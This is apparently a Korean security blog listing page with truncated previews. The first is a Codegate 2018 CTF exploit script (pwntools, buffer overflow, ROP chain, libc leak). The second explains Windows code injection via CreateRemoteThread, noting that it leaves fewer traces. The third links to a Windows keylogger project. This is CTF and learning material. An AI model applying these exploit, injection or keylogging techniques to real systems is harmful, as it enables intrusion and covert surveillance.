[Codegate 2018 CTF] BaskinRobins31 # exploit.py from pwn import * from time import * p = process('./BaskinRobins31') #p = remote('ch41l3ng3s.codegate.kr', 3131) sleep(0.3) print p.recv(1024) payload = str('3') + 'A'*183 payload += p64(0x40087a) + p64(0x1) + p64(0x602040) + p64(0x10) + p64(0x4006d0) payload += p64(0x4008a4) p.sendline(payload) data = p.recv(1024) read = u64(data[237:245]) libc = read - 0xf7250 oneshot = libc + 0x4.. 더보기 code injection Code Injection : 상대방 프로세스에 독립 실행 코드를 삽입한 후 실행하는 기법. CreateRemoteThread() API 이용해 원격 쓰레드 형태로 실행. DLL Injection 과 다르게 흔적을 찾기 어렵고, 메모리를 적게 차지한다. Code Injection 시 고려해야 하는 사항은, Release 모드 빌드 - Debug 모드로 빌드를 하게 되면 코드 중간에 디버깅을 위한 코드가 삽입되어 정확한 크기 알 수 없다. 최적화 옵션 /0d - 최적화 옵션을 해체하여 컴파일러에 의해 소스코드가 최적화 되는 것을 막는다. DEP 해체 - 실행 코드가 정상적으로 동작하지 않음.. 더보기 windows-keylogger # Tested on Windows 7 x64 # https://github.com/woodonggyu/dev-project/tree/master/windows-keylogger 더보기 이전 1 2 3 4 5 6 7 8 ··· 46 다음